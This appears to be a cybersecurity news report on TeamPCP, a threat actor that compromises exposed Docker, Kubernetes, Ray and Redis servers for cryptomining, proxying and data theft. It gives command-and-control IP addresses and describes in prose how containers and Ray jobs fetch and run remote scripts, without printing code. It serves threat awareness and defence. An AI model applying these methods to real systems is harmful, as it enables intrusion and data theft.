TeamPCP, also known as PCPcat, ShellForce, and DeadCatx3, emerged in December 2025 as a sophisticated cloud-native threat actor targeting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell vulnerabilities.
The group launched a massive campaign designed to build a distributed proxy and scanning infrastructure at scale, then compromise servers to exfiltrate data, deploy ransomware, conduct extortion, and mine cryptocurrency.
Activity peaked sharply around Christmas Day 2025, after which infrastructure went largely quiet, though members publicly celebrated stolen data across Telegram channels.
What sets TeamPCP apart is not technical innovation but operational scale and integration.
The campaign weaponizes well-documented vulnerabilities into a cloud-native exploitation platform that turns exposed infrastructure into a self-propagating criminal ecosystem.
The strength lies in large-scale automation rather than novel exploits. Compromised servers are repurposed for cryptomining, proxy networks, command-and-control relays, scanning operations, and data hosting.
Flare researchers identified 185 compromised servers running attacker-deployed containers executing standardized command patterns, providing clear visibility into TeamPCP tradecraft.
Beyond the primary command-and-control node at 67.217.57.240, which appeared on 182 compromised hosts, investigators also identified secondary infrastructure at 44.252.85.168, observed on three additional victim servers.
The presence of multiple control endpoints suggests operational redundancy or early-stage infrastructure migration.
The majority of leaked data comes from Western countries, targeting organizations in e-commerce, finance, and human resources sectors. Cloud infrastructure dominates victims, with Azure accounting for 61% and AWS for 36% of compromised servers, together representing 97% of affected infrastructure.
Attack Mechanism and Worm-Like Propagation
TeamPCP operations begin with automated scanning across massive IP ranges to discover exposed Docker APIs and Ray dashboards.
.webp)
Once access is confirmed, the group deploys malicious containers or jobs remotely through unauthenticated management APIs.
For Docker, they pull an Alpine image and launch a host-networked, auto-restarting container that fetches and executes remote scripts. For Ray, they submit jobs executing base64-encoded bootstrap payloads.
The proxy.sh script acts as the campaign’s operational backbone, installing proxy utilities, peer-to-peer tools, tunneling capabilities, and additional scanners that continuously search the internet for vulnerable servers.
To ensure long-term persistence, the script registers multiple system services, effectively turning each infected host into a self-maintaining scanning and relay node.
When Kubernetes environments are detected, the script branches into a separate execution path and drops cluster-specific secondary payloads, indicating distinct tooling for cloud-native targets rather than generic Linux malware.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
